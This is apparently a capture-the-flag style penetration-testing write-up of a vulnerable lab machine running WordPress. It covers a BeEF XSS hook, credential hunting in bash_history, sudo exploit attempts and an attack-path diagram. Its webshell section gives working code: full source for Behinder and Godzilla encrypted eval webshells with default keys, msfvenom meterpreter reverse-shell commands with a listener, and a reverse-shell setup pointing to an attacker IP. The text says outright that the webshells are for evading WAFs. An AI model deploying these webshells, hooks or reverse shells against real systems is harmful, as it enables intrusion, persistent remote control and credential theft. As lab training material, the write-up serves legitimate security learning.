Visit local test page first http://127.0.0.1:3000/demos/basic.html to see if a zombie comes online:

Step 3: Construct hook URL

BeEF hook script address:

http://172.168.169.128:3000/hook.js

Step 4: Inject the hook into the target page

This is the key step — several methods:

Method 1 — If the page has an input box, inject directly:

<script src="http://192.168.45.187:3000/hook.js"></script>

With God Mode perspective using SHayslett’s account to check admin112233’s homepage — it’s owned by root and can’t be modified. Abandoned.

Method 2 — Exploit WordPress (blog on 12380):

1. Log in to WordPress backend with cracked credentials
2. Inject hook.js in posts/comments/widgets
3. Wait for administrator to visit

Comment awaiting moderator review.

Method 3 — The /admin112233/ page already has XSS, so there might be input points. Scan for them:

# nikto scan on 12380
nikto -h https://192.168.201.148:12380 -ssl

# or gobuster directory scan
gobuster dir -u https://192.168.201.148:12380 -w /usr/share/wordlists/dirb/common.txt -k

Step 5: BeEF control after victim triggers

Here I’m pretending to be John (password cracked from the blog system hash cracking section) — first in the list, likely the admin — to simulate a victim clicking the XSS:

Seemed useless. So I directly modified admin112233’s index.html to verify.

Modify index.html to inject BeEF hook

# Using root account here just for verification and simulation
# In a real engagement, check if you have write permissions
cat > /var/www/https/admin112233/index.html << 'EOF'
<html>
<head>
<title>mwwhahahah</title>
<body>
<noscript>Give yourself a cookie! Javascript didn't run =)</noscript>
<script type="text/javascript">
window.alert("This could of been a BeEF-XSS hook ;)");
</script>
<script src="http://192.168.45.187:3000/hook.js"></script>
</body>
</html>
EOF

Simulate victim access (in Kali browser) at https://192.168.201.148:12380/admin112233/ — ignore the certificate warning and proceed. BeEF control panel should show an online zombie. Note the page is https but hook.js is http — the browser may block due to mixed content. Click to allow insecure content in the browser address bar, or convert the hook to https.

If still not working, modify browser settings (simulating a victim’s unsafe browser configuration):

# Type in Firefox address bar
about:config 
# Search for 
security.mixed_content.block_active_content 
# Set to false

Once a browser visits a page containing hook.js, the BeEF control panel shows an online zombie. Available commands include:

Commands panel can execute:
├── Get Cookie (check if HttpOnly prevents theft)
├── Keylogging
├── Screenshots
├── Internal network recon (scan internal hosts)
├── Get browser info, saved passwords
├── Social engineering popups (fake login forms for credential theft)
└── Redirect to phishing pages

Actual value on this machine:

XSS → Steal admin Cookie
     → Forge admin login to WordPress backend
     → Upload malicious plugin/theme → webshell
     → Escalate from www-data

This is a complete XSS → RCE chain requiring no initial credentials.

Since this is a lab environment, both attacker and victim roles were played by me.

Finding Which Fool Logged in with Plaintext SSH

grep -r "sshpass" /home/*/.bash_history 2>/dev/null

The output shows the file path, e.g. /home/someuser/.bash_history:sshpass -p .... The username in the path is the leaker.

More comprehensive search:

grep -r "sshpass\|password\|passwd" /home/*/.bash_history 2>/dev/null

It was you, JKanode! lmao. Beyond .bash_history, you can also check:

# Recent login records
last JKanode

# Failed login records
lastb JKanode 2>/dev/null

# Last login time
lastlog | grep JKanode

# Current/recent terminal activity
who
w

# Process history (if audited)
cat /var/log/auth.log | grep JKanode

The .bash_history already reveals this user’s problem — typing passwords in plaintext on the command line (sshpass -p). In a real environment, this is a serious operational security failure: passwords are permanently saved in the history file, and during ps aux execution other users can also see the plaintext password in the process arguments.

After privilege escalation, the following was also discovered:

From ps aux, several interesting findings:

1. Root is running nc listening on port 666

root  1515  nc -nlvp 666

Connecting directly might give a root shell:

nc 127.0.0.1 666

2. Root is running two suspicious scripts

root  1501  /bin/bash /root/python.sh
root  1503  /bin/bash /usr/local/src/nc.sh

If these scripts can be read/written, privilege escalation is possible. Check permissions:

ls -al /usr/local/src/nc.sh
cat /usr/local/src/nc.sh

Port 666 was also checked — just a useless image.

3. JKanode has never logged in (Never logged in)

But their home directory is running SimpleHTTPServer 8888, meaning root started it as JKanode — this account is a “service account”. The password in history was left by someone else’s operations.

4. Overview of open services

• :80 — php -S (www user)
• :8888 — python SimpleHTTPServer (JKanode)
• :666 — nc listening as root ← most suspicious
• sshd/vsftpd/smbd/mysql — standard services

Port 666 should be investigated first.

Port 666 Discovery

For unknown service ports, use nc for probing:

nc 172.168.169.129 666

Output is garbled, but the text message2.jpg is clearly visible.

nc 192.168.179.149 666 > message_666
file message_666     // discovered to be a zip archive
unzip message_666
view message2.jpg

Nothing useful — just a new user appearing in the image. But later, LinPEAS analysis revealed it can be combined with the cron job. See Port 666 Rabbit Hole Becomes a Real Hole

SMB Open Shares

smbclient -N //172.168.169.129/tmp
smbclient -N //172.168.169.129/tmp

Easter Egg New Users

Discovered new user Barry.

Found another new person Abby — not previously seen among SSH and FTP usernames.

Another new person, also from the title: Tim.

Accidentally got hit by a cringe love song — lol.

Hello Dolly is a default Easter egg plugin bundled with WordPress, personally written by Matt Mullenweg (WordPress founder). Every time you enter the admin backend, it randomly displays a lyric from the song in the top right corner.

And it’s actually there…

Akismet Plugin XSS Vulnerability

Both vulnerabilities are stored XSS, but have limited practical value. Analysis:

37902.php — legacy.php XSS

# Run directly — targeting WordPress comment injection
php 37902.php 172.168.169.131:12380/blogblog

The principle is to POST an XSS payload to /wp-content/plugins/akismet/legacy.php — the payload is stored in comments and triggers when the admin reviews them.

30036.html — Admin config page XSS

This requires admin privileges to access /wp-admin/plugins.php. Open the HTML file directly in a browser and submit the form to trigger the backend XSS.

Reality check:

# First confirm if legacy.php exists
curl -k https://172.168.169.131:12380/blogblog/wp-content/plugins/akismet/legacy.php

The plugin directory returns 403 — legacy.php likely doesn’t exist in newer versions. This vulnerability is essentially unusable.

Why it’s irrelevant to this machine:

You already have root. The ultimate goal of these XSS vulnerabilities is merely to steal admin cookies and log into the backend — far less direct than the advanced-video-embed plugin (arbitrary file read) which can directly read wp-config.php for the database password.

Continuing with the 39646.py path is more valuable.

shortcode-ui and two-factor Plugins Have No Applicable Vulnerabilities

No matching exploitable vulnerabilities found.

Search Box SQL Injection Failed

CVE-2021-3156 Privilege Escalation Failed

From LinPEAS results fed to AI for analysis — malloc(): memory corruption + core dump = vulnerability exists and can be exploited:

# Download PoC
wget https://codeload.github.com/worawit/CVE-2021-3156/zip/main -O baron.zip
unzip baron.zip
cd CVE-2021-3156-main
# This machine is i386 architecture — choose the corresponding version
python3 exploit_nss.py

glibc version too old (Ubuntu 16.04 uses 2.23). This PoC doesn’t apply. Try a version that doesn’t depend on tcache:

# Try blasty's version
wget https://codeload.github.com/blasty/CVE-2021-3156/zip/main -O blasty.zip
unzip blasty.zip
cd CVE-2021-3156-main
make

When running, specify the target system:

./sudo-hax-me-a-sandwich
# Lists supported targets — find the Ubuntu 16.04 entry number
./sudo-hax-me-a-sandwich 0  # Replace 0 with the correct number

No matching preset target. Ubuntu 16.04 + sudo 1.8.16 is not in the list. Manual mode requires precise offset calculation — quite cumbersome.

Abandoning this path entirely. CVE-2021-3156 is actually not viable on this machine because:

• glibc 2.23 is too old — tcache version doesn’t work
• blasty’s version has no preset offsets for Ubuntu 16.04
• Manual offset calculation requires a local debugging environment

Common WebShell Techniques

1. Reverse Shell (already used)

cp /usr/share/webshells/php/php-reverse-shell.php .
sed -i -E "s/ip\s*=\s*'127\.0\.0\.1'\s*;/ip = '172.168.169.128';/g; s/port\s*=\s*1234\s*;/port = 4777;/g" php-reverse-shell.php

2. Webacoo

# Install
apt install webacoo -y

# Generate encrypted webshell
webacoo -g -o shell.php

# Connect
webacoo -t -u https://172.168.169.131:12380/blogblog/wp-content/uploads/shell.php

Feature: traffic is base64-encoded, bypasses simple WAFs.

3. Weevely

# Generate
weevely generate hacker123 shell.php

# Connect
weevely https://172.168.169.131:12380/blogblog/wp-content/uploads/shell.php hacker123

Feature: traffic obfuscation, powerful — built-in file manager/port scanner/privilege escalation suggestions.

4. MSF Generation

# Generate meterpreter reverse shell
msfvenom -p php/meterpreter/reverse_tcp \
  LHOST=172.168.169.128 LPORT=4444 \
  -f raw > shell.php

# MSF listener
msfconsole -q -x "use multi/handler; \
  set payload php/meterpreter/reverse_tcp; \
  set LHOST 172.168.169.128; \
  set LPORT 4444; run"

Feature: obtains meterpreter session — the most powerful, directly compatible with subsequent privilege escalation modules.

5. Behinder (冰蝎)

# Fixed PHP shell template for Behinder
cat > shell.php << 'EOF'
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b";
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl')){
    $t="base64_decode";
    $post=$t($post."");
    for($i=0;$i<strlen($post);$i++){
        $post[$i]=$post[$i]^$key[$i+1&15];
    }
}else{
    $post=openssl_decrypt($post,"AES128",$key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __construct($p){eval($p);}}
@new C($params);
?>
EOF

Connect using the Behinder client. Default key: e45e329feb5d925b. Traffic is AES encrypted — best WAF bypass capability.

6. Godzilla (哥斯拉)

cat > shell.php << 'EOF'
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++){
        $c=$K[$i+1&15];
        $D[$i]=$D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if(isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if(isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if(stripos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}
EOF

Tool Comparison:

Pitfalls

Nmap Network Fluctuation Missed Ports

The /var/www/http website directory clearly contains webpage files:

But no matter how many times the website was refreshed, nothing appeared. Appending directories also didn’t help — suspected nmap missed some ports.

Rescanning revealed new ports — port 12380 turned out to be the web server:

Viewing the page source confirmed that port 12380 corresponds to the /var/www/http website directory:

Summary

Attack Path Diagram

flowchart TD
    %% Asset list
    A[Kali attacker]
    B[Target machine]
    C[Port 21: FTP username leak]
    
    D[elly FTP account]
    E[Port 22: SHayslett SSH account]
    F[peter high-privilege account]
    G[root]
    H[Port 139: SMB service]
    I[Port 3306: MySQL / Port 12380: phpMyAdmin]
    K[Port 12380: Blog system]
    L[Cron job]
    M[Port 666: nc service]

    
    %% Path relationships
    A-->|scan|B
    B-->|FTP anonymous login|C
    C-->|hydra brute-force|D
    D-->|passwd leak via FTP hydra brute-force|E
    E-->|bash_history password leak|F
    F-->|sudo -s direct escalation|G
    B-->H-->|SMB enum username leak hydra brute-force|E
    E-->|www config reveals DB password|I
    I-->|DB password john crack|K
    E-->|CVE-2016-4557 kernel exploit|G
    E-->|CVE-2021-4034 kernel exploit|G
    E-->L-->|logrotate write permission|G
    B-->I
    B-->K
    

    K -->|advanced-video LFI get wp-config no login required|I
    K -->|advanced-video LFI get passwd no login required| E
    K -->|WP admin upload reverse shell|F
    I-->|mysql outfile webshell|E
    E-->|linpeas reveals nc service logic|M
    L-->|logrotate rewrites nc service logic|M-->G
    
	%% Line styles: --- (solid), -.-> (dashed), ==> (thick arrow)
	%% -->|condition|: connection with condition text
	%% Rectangle node[ ], diamond decision node{ }, rounded node()
    %% Style definitions
    classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
    classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
    classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
    %% Line style and color scheme (light/dark mode compatible)
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

    %% Apply styles
	 A:::attack
	 B:::public
	 C:::public
	 K:::public
	 H:::public
	 D:::public
	 E:::internal
	 F:::internal
	 G:::internal
	 I:::public
	 L:::internal
	 M:::public

Attack Timeline

gantt
    title Attack Timeline
    dateFormat  YYYY-MM-DD HH:mm
    axisFormat  %m/%d %H:%M
    
    section Reconnaissance Phase
    Target scanning           :a1, 2026-03-14 11:11, 2026-03-14 11:30
    Vulnerability identification           :a2, after a1,  2026-03-14 14:37

    
    section Attack Phase
    Initial access           :crit, b1, after a2,  2026-03-14 15:09
    Privilege escalation           :milestone, b2, after b1, 2026-03-14 15:13

After speed-running the machine on the 14th, I spent the following days reviewing it in depth — the more you dig into this machine, the more there is to find. Kept going all the way until 13

🔔 Want more cybersecurity and programming content?

Follow the LongYuSec-Jing’an public account. We explore cutting-edge technology together and share practical learning resources and tools. We focus on in-depth analysis — no fluff, only the most practical technical content! 💻

Join us now and grow together! 🌟

👉 Long-press or scan the QR code to follow

Reply with keywords from the article to get more technical materials and book recommendations! 📚

Recommended Reading

• Day 1: What is OSCP, How to Register and How to Prepare
• OSCP/OSEP One-on-One Private Tutoring: Guaranteed Path to Advanced Penetration Testing Expert
• CyberSec: Obsidian Knowledge Base for Security Professionals